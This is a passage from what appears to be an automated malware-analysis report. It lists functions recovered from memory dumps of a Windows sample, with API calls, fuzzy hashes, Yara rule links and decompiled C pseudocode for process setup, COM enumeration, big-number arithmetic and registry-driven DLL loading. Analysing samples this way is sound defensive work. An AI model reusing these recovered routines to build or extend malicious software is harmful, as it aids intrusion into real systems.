                              • GetLastError.KERNEL32(?,?,010321BF,00000000,010501F4,01050488,01025BD7,00000003,?,?,0103738E,00000000,?,010501F4), ref: 0103E6FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 17e1c60303e448a364068beb2ecb8996354f5730c76899d7712ee393d0559de2
                              • Instruction ID: c26c3e1ddcd73986cf19590f7579b3a3bd8fbeb4e4d4fc516e537b9c671bba9c
                              • Opcode Fuzzy Hash: 17e1c60303e448a364068beb2ecb8996354f5730c76899d7712ee393d0559de2
                              • Instruction Fuzzy Hash: D1018FB9200304EFD7219F18C844E6AB7F9EF89320B104628EA8293250D771ED018F24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010279AA, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 010279B7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 010279C7
                              • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 010279D0
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,0103FBB5,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 010279EE
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,0103FBB5,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 010279FB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                              • String ID:
                              • API String ID: 3667519916-0
                              • Opcode ID: 4852005db30271f4b782853ea70f7686cb3ce87c08044d7b2e6210a31b150377
                              • Instruction ID: c6bf5548a559be87de954c9125bb674470a29b8899b6d909e9a75f65ee785d1f
                              • Opcode Fuzzy Hash: 4852005db30271f4b782853ea70f7686cb3ce87c08044d7b2e6210a31b150377
                              • Instruction Fuzzy Hash: 62F09AB5340710AFE7306A3D9D88F1AB6ECBF58350F100629F6C2D2990CB29E805CA20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010322F0, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0103DA5A,?), ref: 010322F8
                              • GetVersion.KERNEL32 ref: 01032307
                              • GetCurrentProcessId.KERNEL32 ref: 0103231E
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0103233B
                              • GetLastError.KERNEL32 ref: 0103235A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: 7af500df7061be252b858d9d99e8b10bd8f9b7805d8ade08723b645a84285c57
                              • Instruction ID: 4cb248ef76af9a68fddf8127a61f03aba7795d912d1b998e2dc7d4a781adda73
                              • Opcode Fuzzy Hash: 7af500df7061be252b858d9d99e8b10bd8f9b7805d8ade08723b645a84285c57
                              • Instruction Fuzzy Hash: F2F049B4780301EFE7708F28AA4971E3BA8B745B40F108519FACADA1CCD77A94418F1A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E2CBF, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E2CBF(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x13ed2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x13ed294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x13ed290 = _t6;
					 *0x13ed29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x13ed28c = _t7;
					if(_t7 == 0) {
						 *0x13ed28c =  *0x13ed28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                              0x013e2cc7
                              0x013e2ccf
                              0x013e2cd4
                              0x00000000
                              0x013e2d29
                              0x013e2cd6
                              0x013e2cde
                              0x013e2ce6
                              0x013e2ce6
                              0x013e2d26
                              0x00000000
                              0x013e2d26
                              0x013e2ce8
                              0x013e2ce8
                              0x013e2ced
                              0x013e2cff
                              0x013e2d04
                              0x013e2d0a
                              0x013e2d12
                              0x013e2d17
                              0x013e2d19
                              0x013e2d19
                              0x00000000
                              0x013e2d20
                              0x013e2ce2
                              0x00000000
                              0x00000000
                              0x013e2ce4
                              0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,013E233B,?), ref: 013E2CC7
                              • GetVersion.KERNEL32 ref: 013E2CD6
                              • GetCurrentProcessId.KERNEL32 ref: 013E2CED
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 013E2D0A
                              • GetLastError.KERNEL32 ref: 013E2D29
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: 6711f39f2633d109c0b1b4d4b1d91f3c6de52707cf0c68919d0642b28c59a9fb
                              • Instruction ID: 6f5aefaddfad66935d7604cf9abfd4826016df8c9ca9034e15fa917bdec0c5d6
                              • Opcode Fuzzy Hash: 6711f39f2633d109c0b1b4d4b1d91f3c6de52707cf0c68919d0642b28c59a9fb
                              • Instruction Fuzzy Hash: 4DF04F71A403199EE7718FA8AD0D76B3FEDB705765F104515E616CE2C8D771C8018F25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010242B5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(010500D0), ref: 010242C6
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Interlocked$DecrementErrorIncrementLast
                              • String ID: t
                              • API String ID: 3567740241-2238339752
                              • Opcode ID: fefb3618b638a8fc57382bd7e3249bd192f8396952f9ce2de49d5e8ab8aa9fdd
                              • Instruction ID: 0cd28038d3fbdf867fef5b2bdc6804c5f8fe55c8e93ba9886fdf9a75cd18e855
                              • Opcode Fuzzy Hash: fefb3618b638a8fc57382bd7e3249bd192f8396952f9ce2de49d5e8ab8aa9fdd
                              • Instruction Fuzzy Hash: 0601F4767406169BFB219E7C9C88B6F3AE1FB92724F120921F9EAC70C0DBB6C4148711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01024300, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(010500D4), ref: 0102430A
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                                • Part of subcall function 01043F93: lstrlen.KERNEL32(?), ref: 010440B7
                                • Part of subcall function 01043F93: RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedTrim$AllocateDecrementErrorHeapIncrementLastlstrlen
                              • String ID: t
                              • API String ID: 3211259430-2238339752
                              • Opcode ID: 25a8b00badf2b5996ec213dd397f87bddfdbb6ed0a2728a5f3b33fed5d396cb0
                              • Instruction ID: 1d3add039439ea193818f195011b4c7925505e7f731877a22b0845caa5f51532
                              • Opcode Fuzzy Hash: 25a8b00badf2b5996ec213dd397f87bddfdbb6ed0a2728a5f3b33fed5d396cb0
                              • Instruction Fuzzy Hash: C7F046773405119FE711AE7C9C88F6F3AD5F791720F120921FAEACB080EA76C4008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102433E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(010500D8), ref: 01024348
                              • InterlockedDecrement.KERNEL32(010500D0), ref: 0102437A
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                                • Part of subcall function 01043F93: StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                                • Part of subcall function 01043F93: StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                                • Part of subcall function 01043F93: lstrlen.KERNEL32(?), ref: 010440B7
                                • Part of subcall function 01043F93: RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedTrim$AllocateDecrementErrorHeapIncrementLastlstrlen
                              • String ID: t
                              • API String ID: 3211259430-2238339752
                              • Opcode ID: 52b06fd1902ee2abd698065706cd6e0627355c24e464f6bb0e9a4d21a8ff8549
                              • Instruction ID: 448bc051f088724452ec879b6d72bf214f9d6a85f52e2c7e72e3859f6e13450f
                              • Opcode Fuzzy Hash: 52b06fd1902ee2abd698065706cd6e0627355c24e464f6bb0e9a4d21a8ff8549
                              • Instruction Fuzzy Hash: 86F0F6777406115BE7519E7C9C88F6F36D5F792720F160921F9EADB084EA66C8008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B778, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17memoryCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedDecrement.KERNEL32(0000001C), ref: 0102B77C
                              • HeapFree.KERNEL32(00000000,?,77E34620,?,?,010429F2,00000000), ref: 0102B797
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010429F2,00000000), ref: 0102B7A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$DecrementInterlocked
                              • String ID: t
                              • API String ID: 2942576174-2238339752
                              • Opcode ID: d301c54969ce36b4a32cf859bfb4518f1790753cad7f177cbdf414ba6cec5f69
                              • Instruction ID: d298c194e7de53af29218e2b06ee46a5338959fbc929f58c51eb65e6e69c6230
                              • Opcode Fuzzy Hash: d301c54969ce36b4a32cf859bfb4518f1790753cad7f177cbdf414ba6cec5f69
                              • Instruction Fuzzy Hash: 20D09EB5640325BBDBB15F61ED48E5B7F7DFB44750F000061F64992029D72BA861DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102CBF6, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON
                              Download Yara Rule
                              APIs
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CC80
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CC91
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CCA9
                              • CloseHandle.KERNEL32(?), ref: 0102CCC3
                              • HeapFree.KERNEL32(00000000,?), ref: 0102CCD8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$CloseHandle
                              • String ID:
                              • API String ID: 1910495013-0
                              • Opcode ID: 3d1d7fdb82669b2c5e9429b480ce80081fc949e3e5682fe48363f8af0e8888bf
                              • Instruction ID: bc71697ef633386216632a13822a2bcdce5089f8b51730527492f4b1b75c9578
                              • Opcode Fuzzy Hash: 3d1d7fdb82669b2c5e9429b480ce80081fc949e3e5682fe48363f8af0e8888bf
                              • Instruction Fuzzy Hash: 4131AC70201625AFE7A59F69DEC485EFBAAFF04B003648550F289C7614C736ECA1CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102818B, Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010449B3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 010449CE
                                • Part of subcall function 010449B3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 01044A1C
                                • Part of subcall function 010449B3: GetProcAddress.KERNEL32(00000000,?), ref: 01044A35
                                • Part of subcall function 010449B3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 01044A86
                              • GetLastError.KERNEL32(?,?,?), ref: 01028319
                              • FreeLibrary.KERNEL32(?,?,?), ref: 01028381
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                              • String ID:
                              • API String ID: 1730969706-0
                              • Opcode ID: 2a0fffc928e3af0f43f77cfe2dac981ff8cd6bb8882b2c0747919f8fe05e9279
                              • Instruction ID: b3e9db43e6b2ddf9d23f2a8bce1dcdb4976a92c9fcba5744ee92e4708f061548
                              • Opcode Fuzzy Hash: 2a0fffc928e3af0f43f77cfe2dac981ff8cd6bb8882b2c0747919f8fe05e9279
                              • Instruction Fuzzy Hash: 9B71F6B5D00219EFCF10DFE9C8889AEBBF9FF48304B1485AAE555A7221D731A941CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E52A1, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E013E52A1(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x13ed2b8; // 0x26ea5a8
					_t5 = _t102 + 0x13ee038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x13ec2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x13ed2b8; // 0x26ea5a8
												_t28 = _t108 + 0x13ee0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x13ed2b8; // 0x26ea5a8
														_t33 = _t78 + 0x13ee078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                              0x013e52a6
                              0x013e52af
                              0x013e52b0
                              0x013e52b4
                              0x013e52ba
                              0x013e52c0
                              0x013e52c9
                              0x013e52cf
                              0x013e52d9
                              0x013e52db
                              0x013e52e1
                              0x013e52e6
                              0x013e52f1
                              0x013e52f9
                              0x013e52fc
                              0x013e541f
                              0x013e5302
                              0x013e5302
                              0x013e530f
                              0x013e5315
                              0x013e531b
                              0x013e531f
                              0x013e5325
                              0x013e5332
                              0x013e5336
                              0x013e533c
                              0x013e533f
                              0x013e5345
                              0x013e534b
                              0x013e5351
                              0x013e5354
                              0x013e5357
                              0x013e535d
                              0x013e5366
                              0x013e536c
                              0x013e536d
                              0x013e5370
                              0x013e5371
                              0x013e5372
                              0x013e537a
                              0x013e537b
                              0x013e537c
                              0x013e537e
                              0x013e5382
                              0x013e5386
                              0x00000000
                              0x00000000
                              0x013e538c
                              0x013e5395
                              0x013e539b
                              0x013e53a5
                              0x013e53a9
                              0x013e53ab
                              0x013e53b8
                              0x013e53bc
                              0x013e53c4
                              0x013e53c9
                              0x013e53db
                              0x013e53dd
                              0x013e53e3
                              0x013e53e3
                              0x013e53ec
                              0x013e53ec
                              0x013e53ee
                              0x013e53f4
                              0x013e53f4
                              0x013e53f7
                              0x013e53fd
                              0x013e5400
                              0x013e5409
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e5409
                              0x013e535d
                              0x013e5357
                              0x013e533f
                              0x013e540f
                              0x013e540f
                              0x013e5415
                              0x013e5415
                              0x013e541b
                              0x013e541b
                              0x013e5424
                              0x013e542a
                              0x013e542a
                              0x013e52e6
                              0x013e5433

                              APIs
                              • SysAllocString.OLEAUT32(013EC2B0), ref: 013E52F1
                              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 013E53D3
                              • SysFreeString.OLEAUT32(00000000), ref: 013E53EC
                              • SysFreeString.OLEAUT32(?), ref: 013E541B
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloclstrcmp
                              • String ID:
                              • API String ID: 1885612795-0
                              • Opcode ID: d8eecb978d4a43a546341aa06bf45d091d188ce8a6e4006eac60daffdd7177c4
                              • Instruction ID: a240ea6141f7d2e72a217f68c3b549ab5a28d322d41f06ceec5f3ae0c82d87bd
                              • Opcode Fuzzy Hash: d8eecb978d4a43a546341aa06bf45d091d188ce8a6e4006eac60daffdd7177c4
                              • Instruction Fuzzy Hash: 5E514D76E0061AEFCB10DFA8C4889AEBBF9EF89309B144594E915EB254D7719D01CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E42E6, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(?), ref: 013E4327
                              • SysFreeString.OLEAUT32(?), ref: 013E440A
                                • Part of subcall function 013E52A1: SysAllocString.OLEAUT32(013EC2B0), ref: 013E52F1
                              • SafeArrayDestroy.OLEAUT32(?), ref: 013E445E
                              • SysFreeString.OLEAUT32(?), ref: 013E446C
                                • Part of subcall function 013E2C14: Sleep.KERNEL32(000001F4), ref: 013E2C5C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFree$ArrayDestroySafeSleep
                              • String ID:
                              • API String ID: 3193056040-0
                              • Opcode ID: 7198be1e6f61f845ad1e028c893b81ac60ac996e5b442935fb87ab69a4bf5ffb
                              • Instruction ID: 5d4573dea6cb0934f5a2e48edb2d945f7bb94d95eafae56983ccf280d21f6d88
                              • Opcode Fuzzy Hash: 7198be1e6f61f845ad1e028c893b81ac60ac996e5b442935fb87ab69a4bf5ffb
                              • Instruction Fuzzy Hash: 61510F35A0021AEFDB10DFA8D88889EBBF6FF88304B148868E615EB254D771AD45CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01043CD4, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01043D87
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01043D9D
                              • memset.NTDLL ref: 01043E46
                              • memset.NTDLL ref: 01043E5C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 34336076ee0126ae28bc418c981312c9d0c7431971293146a0597ec7e91fe448
                              • Instruction ID: 2a2e81d9b3bfabe7a85b0a7614d12d756fc3c5a4936671c717af444819dec8c4
                              • Opcode Fuzzy Hash: 34336076ee0126ae28bc418c981312c9d0c7431971293146a0597ec7e91fe448
                              • Instruction Fuzzy Hash: 3841A47160022AAFDB20AF68DC80BDE7775EF55710F104579F985AB180DB70AE54CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E2698, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E013E2698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E013E455D(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E013E6CD0(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E013E21F3(_t101,  &_v428, _a8, _t96 - _t81);
					E013E21F3(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E013E6CD0(_t101, 0x13ed168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E013E6CD0(_a16, _a4);
						E013E3213(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L013EB030();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L013EB02A();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E013E3CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E013E675C(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E013E9089(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x13ed168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                              0x013e269b
                              0x013e26a7
                              0x013e26ad
                              0x013e26b2
                              0x013e26b6
                              0x013e2828
                              0x013e282c
                              0x013e282c
                              0x013e26bc
                              0x013e26c0
                              0x013e26c6
                              0x013e26c7
                              0x013e26d2
                              0x013e26d8
                              0x013e26dd
                              0x013e26e0
                              0x013e26fa
                              0x013e2709
                              0x013e2715
                              0x013e271f
                              0x013e2724
                              0x013e2726
                              0x013e2729
                              0x013e27e0
                              0x013e27e6
                              0x013e27f7
                              0x013e280a
                              0x013e2820
                              0x00000000
                              0x013e2825
                              0x013e2732
                              0x013e2739
                              0x013e273d
                              0x013e2743
                              0x013e2745
                              0x013e2747
                              0x013e2749
                              0x013e274b
                              0x013e2755
                              0x013e275a
                              0x013e275c
                              0x013e275e
                              0x013e275f
                              0x013e2760
                              0x013e2761
                              0x013e2768
                              0x013e276f
                              0x013e2772
                              0x013e2772
                              0x013e273f
                              0x013e273f
                              0x013e273f
                              0x013e277a
                              0x013e2782
                              0x013e278e
                              0x013e2793
                              0x013e2793
                              0x013e2798
                              0x00000000
                              0x00000000
                              0x013e279a
                              0x013e279d
                              0x013e27aa
                              0x00000000
                              0x00000000
                              0x013e27ac
                              0x013e27ac
                              0x013e27b9
                              0x013e2793
                              0x013e2798
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e2798
                              0x013e27c3
                              0x013e27c6
                              0x013e27c9
                              0x013e27d0
                              0x013e27d0
                              0x013e27dd
                              0x00000000
                              0x013e27dd
                              0x013e26c9
                              0x013e26cd
                              0x013e26ce
                              0x013e26d0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e26d0
                              0x00000000

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 013E274B
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 013E2761
                              • memset.NTDLL ref: 013E280A
                              • memset.NTDLL ref: 013E2820
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
